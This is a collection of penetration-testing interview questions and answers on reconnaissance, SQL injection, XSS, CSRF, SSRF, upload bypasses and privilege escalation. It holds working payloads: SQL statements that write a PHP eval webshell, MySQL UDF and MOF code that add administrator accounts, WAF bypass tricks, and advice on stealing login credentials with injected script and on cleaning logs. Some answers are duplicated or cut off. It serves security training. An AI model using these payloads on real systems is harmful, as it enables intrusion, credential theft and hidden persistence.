Collection of Penetration Testing Interview Questions
1. Thought process
1. Information collection
a. Server-related information (real IP, system type, version, open ports, WAF, etc.)
b. Website fingerprint identification (including cms, cdn, certificate, etc.), dns records
c. Whois information, name, record, email, phone number reverse check (if the email is lost in the social worker database, social workers prepare, etc.)
e. Subdomain name collection, side stations, C segment, etc.
f. Google hacking targeted search, PDF files, middleware versions, weak password scanning, etc.
g. Scan the website directory structure to leak sensitive files such as the backend, website banner, test files, backups, etc.
h. Transmission protocol, common vulnerabilities, exp, github source code, etc.
2. Vulnerability mining
a. Browse the website to see its size, functions, features, etc.
b. Scan ports, weak passwords, directories, etc., and perform vulnerability detection on the responding ports, such as rsync, heart bleeding, mysql, ftp, ssh weak passwords, etc.
c. XSS, SQL injection, upload, command injection, CSRF, cookie security detection, sensitive information, communication data transmission, brute force cracking, arbitrary file upload, unauthorized access, unauthorized access, directory traversal, file inclusion, replay attack (SMS bombing), server vulnerability detection, and finally using missing scanning tools, etc.
3. Vulnerability Exploitation & Privilege Escalation
a. mysql privilege elevation, serv-u privilege elevation, oracle privilege elevation
b. Windows overflow privilege escalation
c. Linux dirty cow, kernel vulnerability elevating privileges
4. Clear test data & output report
Clean and summarize logs and test data
, output penetration test reports, and attach repair plans
5. Retest
Verify and discover whether there are new vulnerabilities, output reports, and archive
2. Problems
1. When you get a station to be tested, what do you think you should do first?
Information collection:
a. Obtain the whois information of the domain name, obtain the registrant's email, name, phone number, etc., throw it into the social worker database to see if there is any leaked password, and then try to use the leaked password to log in to the backend. Use your email address as keywords to enter into search engines. Use the searched related information to find other email addresses and obtain commonly used social accounts. The social worker finds out the social account and may find out the administrator's habit of setting passwords. Use existing information to generate a dedicated dictionary.
b. Query the side sites of the server and sub-domain name sites. Since the main site is generally more difficult, check first to see if there are any common CMS or other vulnerabilities in the side sites.
c. Check the server operating system version and web middleware to see if there are known vulnerabilities, such as IIS, APACHE, and NGINX parsing vulnerabilities.
d. Check the IP, perform IP address port scanning, and perform vulnerability detection on the responding ports, such as rsync, heart bleeding, mysql, ftp, ssh weak passwords, etc.
e. Scan the website directory structure to see if the directory can be traversed or sensitive files are leaked, such as php probe
f and google hack to further detect website information, background, and sensitive files
Vulnerability scanning
begins to detect vulnerabilities, such as XSS, XSRF, sql injection, code execution, command execution, unauthorized access, directory reading, arbitrary file reading, downloading, file inclusion, remote command execution, weak password, upload, editor vulnerability, Brute force cracking, etc.
Exploiting vulnerabilities:
Use the above method to obtain webshell or other permissions
Privilege elevating
server, such as mysql udf privilege escalation under windows, serv-u privilege escalation, vulnerabilities in lower versions of windows, such as iis6, pr, brazilian barbecue, linux dirty cow vulnerability, linux kernel version vulnerability privilege escalation, under linux mysql system privilege escalation and oracle low privilege escalation
Log cleaning
Summary report and repair plan
2. What is the significance of determining the website’s CMS for penetration?
Look for program vulnerabilities that have been exposed online.
If it is open source, you can also download the corresponding source code for code audit.
3. For a mature and relatively safe CMS, what is the significance of scanning directories during penetration?
Sensitive files and secondary directory scanning
Misoperation by webmasters, for example: compressed files, description .txt, and secondary directories of website backups may store other sites.
4. Common website server containers.
IIS、Apache、nginx、Lighttpd、Tomcat
5. At the mysql injection point, use a tool to directly write a sentence to the target site. What are the conditions required?
root permissions and the absolute path to the website.
6. Which versions of containers are currently known to have parsing vulnerabilities, with specific examples.
a. IIS 6.0
/xx.asp/xx.jpg "xx.asp" is the folder name
b. Fast-CGI is turned on by default in IIS 7.0/7.5
. If you enter /1.php directly after the image address in the URL, the normal image will be parsed as php.
c. Nginx
version is less than or equal to 0.8.37. The usage method is the same as IIS 7.0/7.5. It can also be used when Fast-CGI is turned off. Null byte code xxx.jpg.php
d. The file uploaded by Apache is named: test.php.x1.x2.x3. Apache determines the suffix from right to left.
e. lighttpd xx.jpg/xx.php is not complete, please feel free to add more in the comments, thank you!
7. How to quickly manually determine whether the target station is a windows or linux server?
Linux is case sensitive, Windows is case insensitive.
8. Why does a mysql database site have only one port 80 open?
I changed the port but it was not scanned.
Site library separation.
Port 3306 is not open to the public
9. Several situations in which 3389 cannot connect
Port 3389 is not open.
The port has been modified
for protection and interception.
It is in the intranet (port forwarding is required).
10. How to break through characters being escaped when injected?
Wide character injection
hex encoding bypass
11. What should you do first when you see the editor on a backend news editing interface?
Look at the name version of the editor and search for public vulnerabilities.
12. I got a webshell and found that there is an .htaccess file in the root directory of the website. What can we do?
There are many things that can be done. Let’s take a hidden network horse as an example:
Insert
<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php
.jpg files will be parsed into .php files.
I can’t go into details about other specific things. I suggest you search for the sentences yourself and play around.
13. Can the injection vulnerability only check the account password?
As long as the authority is wide, drag the library until you are old.
14. Will the security dog track the variables and find out that it is a one-sentence Trojan?
It is based on the feature code, so it is easy to bypass it. As long as you have a broad mind, you can go around the dog and get to the joy, but this should not be set in stone.
15.Access scans out the database file with the suffix asp, and the access is garbled. How can it be used locally?
Download through Thunder and directly change the suffix to .mdb.
16. When elevating privileges, select a readable and writable directory. Why try not to use directories with spaces?
Because most exp executions require spaces to delimit parameters.
17. A certain server has sites A and B. Why is the test user added to A’s backend to access B’s backend? Found that the test user has also been added?
Same database.
18. When injecting, can I start injecting directly by ordering without using and, or or xor?
and/or/xor, the previous 1=1, 1=2 steps are just to determine whether it is an injection point. If it is already determined to be an injection point, you can save that step.
19: A certain anti-injection system will prompt: during injection:
The system has detected that you have committed illegal injection.
Your IP xx.xx.xx.xx has been recorded
Time: 2016:01-23
Submit page: test.asp?id=15
Submit content: and 1=1
20. How to use this anti-injection system to get the shell?
Submit a sentence directly in the URL, so that the website will record your sentence into the database file. At this time, you can try to find the configuration file of the website and directly link to the chopper.
21. What are the solutions when accessing garbled characters after uploading to Malaysia?
Change the encoding in the browser.
22. What is the significance of reviewing the elements of the upload point?
The restrictions on uploaded file types of some sites are implemented on the front end. In this case, just adding the upload type can break the restrictions.
23. The target site prohibits user registration. When retrieving the password, enter the user name and it will prompt: "This user does not exist." How do you think this can be used?
First crack the username, and then use the cracked username to crack the password.
In fact, some sites will also prompt like this at the login point.
All places that interact with the database may have injection.
24. The target station found that the download address of a certain txt is
http://www.test.com/down/down.php?file=/upwdown/1.txt, what are your ideas?
This is the legendary download vulnerability! Try entering index.php after file= to download its homepage file, and then continue to search for the configuration files of other websites in the homepage file. You can find out the database password and database address of the website.
25. A gives you a target site and tells you that the /abc/ directory exists in the root directory, and that the editor and admin directories exist in this directory. What are your thoughts?
Scan sensitive files and directories directly in the website's secondary directory /abc/.
26. How to use xss to achieve long-term control of the target site when there is a shell?
Add a js section to the background login area to record the login account and password, and determine whether the login is successful. If the login is successful, record the account password into a file with an uncommon path or send it directly to your own website file. (This method is suitable for valuable networks that require in-depth control of permissions).
Insert XSS scripts into files that can only be accessed after logging in.
27. When changing the administrator password in the background, the original password is displayed as *. How do you think we should read out this user's password?
In the inspection element, change the password attribute of the password to text and the plain text will be displayed.
28. The target site is unprotected. Uploading pictures can be accessed normally, but uploading script format access will result in 403. What is the reason?
There are many reasons. It is possible that the web server configuration has hard-coded the upload directory and does not execute the corresponding script. Try changing the suffix name to bypass it.
29. How do you think the censorship element knows the protection software used by the website?
When sensitive operations are intercepted and the protection cannot be determined specifically through the interface information, F12 can look at the HTML body such as Guardian God to see the content in the name.
30. What is the purpose of creating a .zhongzi folder in the win2003 server?
Hide the folder to prevent administrators from discovering the tools you uploaded.
31. SQL injection has the following two test options. Choose one and explain the reasons for not choosing the other:
A. demo.jsp?id=2+1
B. demo.jsp?id=2-1
choose B. In URL encoding, + represents a space, which may cause confusion.
32. There is a SQL injection vulnerability in the following link. What are your thoughts on this modified injection?
demo.do?DATA=AjAxNg==
DATA may be base64 encoded and then passed to the server, so we also need to base64 encode the parameters to complete the test correctly.
33. Found demo.jsp?uid=110 injection point. What ideas do you have to obtain webshell? Which one is the best?
If you have write permission, use INTO OUTFILE to construct a joint query statement. You can redirect the query output to the system file, so as to write to WebShell. Use sqlmap –os-shell. The principle is the same as the above one to directly obtain a Shell, which is more efficient. Get the account and password of the website administrator by constructing a joint query statement, then scan the background to log in to the background, and then upload the Shell in the background by modifying the package and uploading it.
34. What is the difference between CSRF, XSS and XXE, and how to fix it?
XSS is a cross-site scripting attack. Code can be constructed and executed in the data submitted by the user, thereby achieving attacks such as stealing user information. Repair method: escape character entities, use HTTP Only to prevent JavaScript from reading cookie values, verify when inputting, and use the same character encoding in browsers and web applications.
CSRF is a cross-site request forgery attack. XSS is one of the many ways to implement CSRF. It is due to the fact that there is no confirmation whether the user voluntarily initiated it when the key operation is executed. Repair method: Filter out the pages that need to prevent CSRF and then embed the Token, enter the password again, and verify that Referer XXE is an XML external entity injection attack. In XML, you can request local or remote content by calling entities. It is similar to remote file protection and will cause related Security issues such as sensitive file reading. Fix: The XML parsing library strictly prohibits parsing external entities when calling.
35. What is the difference between CSRF, SSRF and replay attacks?
CSRF is a cross-site request forgery attack. SSRF initiated by the client is a server-side request forgery. A replay attack initiated by the server replays the intercepted data packets to achieve identity authentication and other purposes.
36. Name at least three business logic vulnerabilities and how to fix them?
Password retrieval vulnerability exists
1) The password allows brute force cracking,
2) There is a universal retrieval voucher,
3) You can skip the verification step,
4) To retrieve the voucher, you can intercept the package and obtain it.
etc. to obtain the password through the password retrieval function provided by the manufacturer. The most common authentication vulnerabilities are
1) Session fixation attack
2) Cookie counterfeiting
As long as you get the Session or Cookie, you can forge the user's identity. There is a vulnerability in the verification code
1) Verification code allows brute force cracking
2) The verification code can be bypassed through Javascript or package modification.
37. Circle the items that may have problems in the following conversation and mark the possible problems?
get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”
HTTP/1.1Host:***.com:82User-Agent:Mozilla/
5.0 Firefox/40Accept:text/css,/;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://*******.com/eciop/orderForCC/
cgtListForCC.htm?zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive
If you have write permission, use INTO OUTFILE to construct a joint query statement. You can redirect the query output to the system file, so as to write to WebShell. Use sqlmap –os-shell. The principle is the same as the above one to directly obtain a Shell, which is more efficient. Get the account and password of the website administrator by constructing a joint query statement, then scan the background to log in to the background, and then upload the Shell in the background by modifying the package and uploading it.
38. Given a website, how do you conduct penetration testing? Under the premise of obtaining written authorization.
39. sqlmap, how to inject an injection point?
1) If it is a get model, directly, sqlmap -u "such as point URL".
2) If it is a post type, such as point, you can sqlmap -u "injection point URL" --data="post parameters"
3) If it is a cookie ,
40. nmap, several methods of scanning
41. What are the types of sql injection?
1) Error injection
2) Bool injection
3) Delay injection
4) Wide byte injection
42. What are the functions injected for error reporting? 10
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2)通过floor报错 向下取整
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
5).multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
6).polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
7).multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
8).linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
9).multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
10).exp()select from test where id=1 and exp(~(select * from
43. How to judge delayed injection?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
44. What do blind injection and delayed injection have in common?
It’s all judged character by character.
45. How to get the webshell of a website? Uploading, editing templates in the background, sql injection and writing files, command execution, code execution, some cms vulnerabilities that have been exposed, such as dedecms background can directly create script files, wordpress upload plug-in contains script file zip package, etc.
46. What are the functions for sql injection and writing files?
select '一句话' into outfile '路径'
select '一句话' into dumpfile '路径'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
47. How to prevent CSRF?
1) Verify referer
2) Verify token
details: http://cnodejs.org/topic/5533dd6e9138f09b629674fd
48. What are the vulnerabilities of owasp?
1) SQL injection protection methods:
2) Failed authentication and session management
3) Cross-site scripting attack XSS
4) Direct reference to insecure objects
5) Security configuration errors
6) Sensitive information leakage
7) Lack of functional-level access control
8 ) Cross-site request forgery CSRF
9) Using components with known vulnerabilities
10) Unvalidated redirects and forwards
49. SQL injection protection method?
1) Use a safe API
2) Escape the input special characters
3) Use a whitelist to standardize the input verification method
4) Control the client input and do not allow the input of special characters related to SQL injection
5) Server side Before submitting the database for SQL query, special characters are filtered, escaped, replaced, and deleted.
50. What are the functions for code execution, file reading, and command execution?
1) Code execution:
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
2) File reading:
file_get_contents(),highlight_file(),fopen(),read
file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
3) Command execution:
system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()
51. In addition to the onerror attribute of the img tag, is there any other way to obtain the administrator path?
src specifies a remote script file to obtain the referer
52. In addition to the onerror attribute of the img tag, the suffix name of the src attribute must end with .jpg. How to obtain the administrator path.
1) The remote server modifies the apache configuration file and configures the .jpg file to parse AddType application/x-httpd-php .jpg in PHP mode.
53. Why does the aspx Trojan have greater authority than asp?
aspx uses .net technology. It is not supported by default in IIS, and ASP is just a scripting language. When invading, ASP Trojans usually have guest permissions... APSX Trojans usually have users permissions.
54. How to bypass waf?
Case conversion method
interference character /!/
encoding base64 unicode hex url ascll
complex parameters
55. How to write webshell to the server?
Various upload vulnerabilities
mysql has write permission, use sql statement to write shell
http put method
56. Common ports in penetration testing
a. Web class (web vulnerability/sensitive directory) Third-party common component vulnerability struts thinkphp jboss ganglia zabbix
80 web
80-89 web
8000-9090 web
b. Database class (scanning for weak passwords)
1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL
c. Special service category (unauthorized/command execution category/vulnerability)
443 SSL is bleeding
873 Rsync is not authorized
5984 CouchDB http://xxx:5984/_utils/
6379 redis is not authorized
7001,7002 WebLogic default weak password, reverse sequence
9200,9300 elasticsearch Reference WooYun: Play the ElasticSearch command execution of a certain server Vulnerability
11211 memcache unauthorized access
27017, 27018 Mongodb unauthorized access
50000 SAP command execution
50070, 50030 hadoop default port unauthorized access
d. Common port categories (scanning for weak passwords/port blasting)
21 ftp
22 SSH
23 Telnet
2601,2604 zebra routing, default password zebra
3389 remote desktop
ALL, total port details
21 ftp
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL bleeding and some web vulnerability testing
445 SMB
512,513,514 Rexec
873 Rsync unauthorized
1025,111 NFS
1433 MSSQL
1521 Oracle:(iSqlPlus Port:5560 , 7778)
2082/2083 cpanel host management system login (more used abroad)
2222 DA virtual host management system login (more used abroad)
2601,2604 zebra routing, default password zebra
3128 squid proxy default port, if no password is set, it is possible Just roam the intranet directly
3306 MySQL
3312/3311 kangle host management system login
3389 Remote desktop
4440 rundeck Reference WooYun: Borrowing a Sina service to successfully roam the Sina intranet
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 varnish Reference WooYun: Varnish HTTP accelerator CLI Unauthorized access can easily lead to direct tampering of the website or entering the intranet as a proxy 6379
Unauthorized redis
7001,7002 WebLogic default weak password, reverse sequence
7778 Kloxo host control panel login
8000-9090 are some Common web ports, some operations and maintenance like to open the management background on these non-80 ports
8080 tomcat/WDCP host management system, the default weak password is
8080, 8089, 9090 JBOSS
8083 Vestacp host management system (more used abroad)
8649 ganglia
8888 amh/LuManager host management system default port
9200, 9300 elasticsearch Reference WooYun: Duowan certain server ElasticSearch command execution vulnerability
10000 Virtualmin/Webmin server virtual host management system
11211 memcache unauthorized access
27017, 27018 Mongodb unauthorized access
28017 mongodb statistics page
50000 SAP command execution
50070, 50030 hadoop default port unauthorized access
3. A certain security manufacturer
了解哪些漏洞
文件上传有哪些防护方式
用什么扫描端口,目录
如何判断注入
注入有防护怎么办
有没有写过tamper
3306 1443 8080是什么端口
计算机网络从物理层到应用层xxxx
有没有web服务开发经验
如何向服务器写入webshell
有没有用过xss平台
网站渗透的流程
mysql两种提权方式(udf,?)
常见加密方式xxx
ddos如何防护
有没有抓过包,会不会写wireshark过滤规则
清理日志要清理哪些
4. SQL injection protection
1. Use a safe API
2. Escape the input special characters
3. Use a whitelist to standardize the input verification method
4. Control the client input and do not allow the input of special characters related to SQL injection
5. Server side Before submitting the database for SQL query, special characters are filtered, escaped, replaced, and deleted.
6. Standard encoding and character set
5. Why parameterized queries can prevent SQL injection
principle:
When using parameterized query, the database server will not execute the parameter content as part of the sql instruction. It will apply the parameters after the database completes the compilation of the sql instruction.
To put it simply: The reason why parameterization can prevent injection is that the statement is a statement and the parameters are parameters. The value of the parameter is not part of the statement. The database only runs according to the semantics of the statement.
6. SQL header injection point
UA
REFERER
COOKIE
IP
7. What is a blind bet? How to make a blind bet?
Blind injection is a method in which the server turns off error echo during the SQL injection attack, and we simply judge whether there is SQL injection and exploitation based on changes in the content returned by the server. There are two methods of blind injection. One is to verify whether there is injection by checking whether the return content of the page is correct (boolean-based). One is to determine whether there is injection (time-based) based on the difference in SQL statement processing time. Here, you can use functions such as benchmark and sleep that cause delay effects, or you can construct a joint query table with a large Cartesian product. achieve the purpose of delay.
8. Principles and root causes of wide byte injection
1. Principle of production
When the database uses a wide character set and this problem is not considered in the WEB layer, at the WEB layer, since 0XBF27 is two characters, in PHP, for example, when addslash and magic_quotes_gpc are turned on, the 0x27 single quote will be escaped, so 0xbf27 will become 0xbf5c27, and when the data enters the database, since 0XBF5C is another character, the \ escape symbol will be "eaten" by the preceding bf, and the single quotes can be escaped and used to close the statement.
2. Where to encode
3. Root cause
character_set_client (the character set of the client) and character_set_connection (the character set of the connection layer) are different, or the conversion functions such as iconv and mb_convert_encoding are used improperly.
4. Solution
Unify the character sets used by databases, web applications, and operating systems to avoid differences in parsing. It is best to set them to UTF-8. Or escape the data correctly, such as the use of mysql_real_escape_string+mysql_set_charset.
5. How to use only update in SQL?
First understand this SQL
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
If this SQL is modified into the following form, injection is achieved
a. Modify the homepage value to http://xxx.net', userlevel='3
Then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'
userlevel is the user level
b. Modify the password value to mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
c. After modifying the id value to ' OR username='admin', the SQL statement becomes
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
9. How to write a shell in SQL/What to do if a single quote is filtered
Write shell: root permissions, GPC is closed, know the file path outfile function
http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'
http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'
wide byte injection
1. How to replace spaces
%0a, %0b, %a0 and other
/**/ and other comment characters
<>
2. MySQL website injection, what is the difference between 5.0 and above and 5.0 and below?
There is no information_schema system table below 5.0, so it is not possible to list names, etc., and can only violently stop table names.
Below 5.0 is multi-user single operation, and above 5.0 is multi-user multi-operation.
10. XSS
1. XSS principle
Reflective
Code can be constructed and executed in the data submitted by the user, thereby achieving attacks such as stealing user information. The user needs to be tricked into "clicking" on a malicious link for the attack to be successful.
storage type
Stored XSS will "store" the data entered by the user on the server side. This kind of XSS has strong stability.
DOM type
XSS formed by modifying the DOM nodes of the page is called DOM Based XSS.
2. The difference between DOM type and reflective type
Reflected XSS: XSS that is triggered by our constructed malicious payload by inducing users to click. Detection of Reflected XSS Every time we request a link with payload, the page should contain specific malformed data. DOM type: XSS formed by modifying the DOM node of the page. DOM-based XSS is generated by DOM operations through js code, so we may not even get the corresponding malformed data in the response to the request. The fundamental difference in my opinion is the difference in output points.
3. DOM type and XSS automated testing or manual testing
Manual testing ideas: Find function points such as document.write, innerHTML assignment, outerHTML assignment, window.location operation, write javascript: post-content, eval, setTimeout, setInterval and other direct execution functions. Find its variables, trace back to the source of the variables to see if they are controllable, and whether they pass through the safety function. For automated testing, please refer to Brother Dao's blog. The idea is to start with input, observe the process of variable transfer, and finally check whether there is output in a dangerous function and whether there is a safe function in the middle. But this requires a javascript parser, otherwise some content brought in through js execution will be missed.
When answering this question, since the usual detection of customers is based on the functions of different function points plus experience and intuition, there is actually no detailed standardization of different types of XSS detection methods. Detection method, so the answer is terrible. . .
4. How to quickly discover the location of XSS
5. Suggestions on how to repair XSS
Input point check: Check the validity of the data input by the user, use filters to filter sensitive characters or encode and escape them, and perform format checks on specific types of data. Checking input points is best implemented on the server side.
Output point check: When a variable is output to an HTML page, the output content is encoded and escaped. When it is output in HTML, it is HTMLEncoded. If it is output in a Javascript script, it is JavascriptEncoded. All variables using JavascriptEncode are placed in quotes and dangerous characters are escaped. The data part cannot escape from the quotes and becomes part of the code. You can also use a more strict method and use hexadecimal encoding for all characters other than alphanumeric characters. In addition, it should be noted that in the browser, HTML parsing will take precedence over Javascript parsing, and the encoding method also needs to be carefully considered. For different output points, our methods of defending against XSS may be different. This may be discussed in a subsequent article. Make a summary.
In addition, there is also HTTPOnly to limit cookie hijacking.
6. Production conditions of XSS worms
Under normal circumstances, a page that generates XSS points does not belong to the self page, and pages that generate interactive behaviors between users may cause the generation of XSS Worm.
Stored XSS is not necessarily required
11. CSRF
1. CSRF principle
CSRF is a cross-site request forgery attack. It is initiated by the client because there is no confirmation whether it was voluntarily initiated by the user when executing key operations.
2. Defense
Verify Referer
adds token
3. Compare token and referer horizontally. Which one has higher security level?
The token security level is higher, because not any server can obtain the referer, and if you jump from HTTPS to HTTP, the referer will not be sent. And the referer can be customized in some versions of FLASH. But as for the token, it must be ensured that it is random enough and cannot be leaked. (Principle of Unpredictability)
4. From what angle should the referer be verified? If so, how to prevent problems?
For the verification of the referer in the header, one is an empty referer, and the other is a referer with incomplete filtering or detection. In order to prevent this problem, the regular rules should be well written in the verification whitelist.
5. Regarding tokens, which aspects of tokens will be paid attention to, and which aspects of tokens will be tested?
Quoting an answer from a senior:
Attacks on tokens include, first, attacking the token itself, replaying the test once, analyzing encryption rules, verifying whether the verification method is correct, etc.; second, combining information leakage vulnerabilities to obtain it, and launching combined attacks to potentially leak information
. It is cache, log, get, or it may be the use of cross-site.
Many jump logins rely on tokens. If there is a jump vulnerability and reflective cross-site, it can be combined into login hijacking.
In addition, tokens can also be combined with other businesses to describe the token. How can it be bypassed if the security and design are not good, such as stealing red envelopes and so on?
11. SSRF
SSRF (Server-Side Request Forgery) is a security vulnerability constructed by an attacker to form a request initiated by the server. Typically, SSRF attacks target internal systems that are inaccessible from the external network. (Precisely because it is initiated by the server, it can request the internal system connected to it and isolated from the external network)
Most of the reasons for the formation of SSRF are that the server provides the function of obtaining data from other server applications and does not filter or restrict the target address. For example, obtain web page text content from a specified URL address, load images from a specified address, download, etc.
1. Monitoring
Verification method for SSRF vulnerability:
1) Because the SSRF vulnerability is a security vulnerability that allows the server to send requests, we can determine whether there is an SSRF vulnerability by capturing packets and analyzing whether the request is sent by the server.
2) Find the accessed resource address in the page source code. If the resource address type is www.baidu.com/xxx.php?image= (address), there may be an SSRF vulnerability 4[1]
2. Causes and defense bypasses of SSRF vulnerabilities
Cause: The simulated server made requests for other server resources without verification of legality. Utilization: Construct a malicious intranet IP for detection, or use other supported protocols to attack other services. Defense: prohibit jumps, restrict protocols, internal and external network restrictions, URL restrictions. Bypass: Use different protocols, bypass IP, IP format, add other characters to URL, malicious URL, @ and so on. 301 jump + dns rebinding.
12. Upload
1. Principle of file upload vulnerability
Due to insufficient control or processing defects by programmers over user file uploads, users can upload executable dynamic script files to the server beyond their own permissions.
2. Common upload bypass methods
Front-end js verification: disable js/burp package modification,
case
double suffix,
filter bypass pphphp->php
3. Protection
Set the file upload directory to be non-executable.
Use a whitelist to determine the file upload type
. Rewrite the file name and path with random numbers.
4. What is the significance of reviewing the elements of the upload point?
The restrictions on uploaded file types of some sites are implemented on the front end. In this case, just adding the upload type can break the restrictions.
13. File Contains
1. Principle
Introduce a script or code that the user can control, and let the server execute functions such as include() to introduce the files that need to be included through dynamic variables; the
user can control the dynamic variables.
2. Functions that cause files to be included
PHP:include(), include_once(), require(), re-quire_once(), fopen(), readfile(), … JSP/Servlet:ava.io.File(), java.io.Fil-eReader(), … ASP:include file, include virtual,
3. Local files include
Vulnerabilities that can open and include local files are called local file inclusion vulnerabilities
14. Logical loopholes
1. Common logical loopholes in the financial industry
Targeting only financial businesses, the main ones are data tampering (involving financial data, or judgment data of some businesses), plundering caused by competitive conditions or improper design, leakage of transaction/order information, horizontal unauthorized viewing of other people's accounts or malicious operations. , transaction or business step bypassed.
15. Man-in-the-middle attack
A man-in-the-middle attack is a (lack of) mutual authentication attack; a vulnerability caused by the lack of mutual authentication between the client and the server during the SSL handshake
Solutions to defend against man-in-the-middle attacks are usually based on the following technologies:
1. Public key infrastructure PKI uses the PKI mutual authentication mechanism, the client verifies the server, and the server verifies the client; in the above two examples, only the server is verified, which causes a vulnerability in the SSL handshake link. If mutual authentication is used If so, it can basically provide stronger mutual authentication.
2. Delay test
Computations using complex cryptographic hash functions can cause delays of tens of seconds; if both parties typically take 20 seconds to compute, and the entire communication takes 60 seconds to compute to reach the other party, this could indicate the presence of a third-party intermediary.
3. Use other forms of key exchange
ARP spoofing
principle
Each host has an ARP cache table. The cache table records the correspondence between the IP address and the MAC address, and LAN data transmission relies on the MAC address. There is a flaw in the ARP cache table mechanism, that is, when the requesting host receives the ARP response packet, it does not verify whether it has sent an ARP request packet to the other host, but directly compares the IP address in the return packet with the MAC address. The relationship is saved in the ARP cache table. If there is an original corresponding relationship with the same IP, the original one will be replaced. In this way, the attacker has the possibility to eavesdrop on the data transmitted by the host.
protection
1. Bind the gateway MAC and IP address to the host statically (default is dynamic), command: arp -s gateway IP gateway MAC
2. Bind the host MAC and IP address on the gateway
3. Use ARP firewall
16. DDOS
1. DDOS principle
Using reasonable requests to cause resource overload, resulting in service unavailability
The principle of syn torrent
Forge a large number of source IP addresses and send a large number of SYN packets to the server respectively. At this time, the server will return SYN/ACK packets. Because the source address is forged, the forged IP will not respond and the server does not receive the forged The IP response will be retried 3 to 5 times and wait for a SYNTime (usually 30 seconds to 2 minutes). If it times out, the connection will be discarded. The attacker sends a large number of SYN requests with such forged source addresses. The server will consume a lot of resources (CPU and memory) to process such semi-connections, and at the same time, it must constantly retry SYN+ACK for these IPs. The final result is that the server has no time to respond to normal connection requests, resulting in a denial of service.
CC attack principle
Continuously initiate normal requests to some application pages that consume large resources to achieve the purpose of consuming server-side resources.
2. DOSS protection
SYN Cookie/SYN Proxy, safereset and other algorithms. The main idea of SYN Cookie is to assign a "Cookie" to each IP address and count the access frequency of each IP address. If a large number of data packets from the same IP address are received in a short period of time, it is considered to be under attack, and subsequent packets from this IP address will be discarded.
17. Elevation of authority
Two ways to escalate privileges in MySQL
udf privilege escalation, mof privilege escalation
MySQL_UDF extraction
Requirements: 1. The target system is Windows (Win2000, : For MYSQL 5.1 or above, the udf.dll file must be placed in the lib\plugin folder in the MYSQL installation directory to create a custom function. You can enter select @@basedirshow variables like '%plugins%' in mysql to find the mysql installation. Path privilege escalation:
Create functional functions using SQL statements. Syntax: Create Function function name (the function name can only be one of the following list) returns string soname 'Exported DLL path';
create function cmdshell returns string soname ‘udf.dll’
select cmdshell(‘net user arsch arsch /add’);
select cmdshell(‘net localgroup administrators arsch /add’);
drop function cmdshell;
This directory does not exist by default, so we need to use webshell to find the MYSQL installation directory, create the lib\plugin folder in the installation directory, and then export the udf.dll file to this directory.
MySQL mof privilege escalation
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
Please change the command on line 18 before uploading.
2. Execute load_file and into dumpfile to export the file to the correct location.
select load file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mov'
After the execution is successful, you can add a normal user, then you can change the command, upload and export the execution to upgrade the user to administrator privileges, and then the 3389 connection will be ok.
18. Special loopholes
1、Struts2-045
2. Redis is not authorized
cause
By default, Redis will be bound to 0.0.0.0:6379, which will expose the Redis service to the public network. If authentication is not turned on, any user can access the target server without authorization. Redis and reading data from Redis. Attackers without authorized access to Redis can use Redis-related methods to successfully write the public key on the Redis server, and then use the corresponding private key to directly log in to the target server.
Utilization conditions and methods
condition:
a. The redis service runs with the root account.
b. Redis has no password or weak password for authentication.
c. Redis listens on the 0.0.0.0 public network.
method:
a. Through the INFO command of Redis, you can view server-related parameters and sensitive information, paving the way for the attacker's subsequent penetration. b.
Upload the SSH public key to obtain SSH login permissions.
c. Rebound the shell through crontab.
d. Use the slave master-slave mode.
repair
Password verification,
run with reduced privileges,
restrict IP/modify ports
3. Unauthorized access to Jenkins
4. Unauthorized access to MongoDB
An attacker enters the script command execution interface through unauthorized access to execute attack instructions.
